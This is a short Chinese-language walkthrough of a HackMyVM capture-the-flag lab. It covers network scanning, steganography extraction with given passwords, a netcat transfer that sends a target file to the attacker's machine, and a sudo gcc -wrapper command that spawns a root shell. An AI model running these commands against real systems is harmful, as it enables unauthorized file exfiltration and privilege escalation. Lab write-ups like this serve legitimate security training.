arp-scan -l
nmap -sS -v 192.168.222.45
在源码中可以看到
根据下面的提示可以猜测117db0148dc179a2c2245c5a30e63ab0是一个图像文件
将图片下载到本地
隐写术
在两张图片上使用strings,发现有一些可打印的字符串
strings 117db0148dc179a2c2245c5a30e63ab0.jpg
base64解码
zsteg也可以提取一些关于 PNG 图像的隐藏信息
zsteg 117db0148dc179a2c2245c5a30e63ab0.png
提取png隐藏信息的工具:zsteg、exiftool、binwalk、foremost
提取jpg隐藏信息的工具:strings、steghide
使用 steghide 提取更多信息的密码是“morainelake”
steghide extract -sf 117db0148dc179a2c2245c5a30e63ab0.jpg -p "morainelake"
连接ssh
secret.zip的密码是morainelake
cat history > a
cat history > b
grep -f a b
history可能被写入到定时任务中,每次查看都会更改,真的flag不变
grep -f a b 是一个在 Unix/Linux 系统中常用的命令,用于从文件 b 中筛选出与文件 a 中的模式匹配的行。
将reverse文件发送到本地
nc -lp 1234 > rev2
nc 192.168.222.149 < reverse
分析reverse
将reverse拖进ida,调试,找到密码
运行reverse,输入密码,运行成功
cat tmp |tr -d '\n'
ll104567bamuweta0eviden即为密码
总共有两个用户,尝试登录到welcome
切换用户
su - welcome
提权
sudo -l
sudo /usr/bin/gcc -wrapper /opt/../../../bin/bash,-s .
参考:
hackmyvm medium Reversteg靶场复盘_哔哩哔哩_bilibili
https://nutzh.top/hackmyvm/reversteg/?i=1
gcc | GTFOBins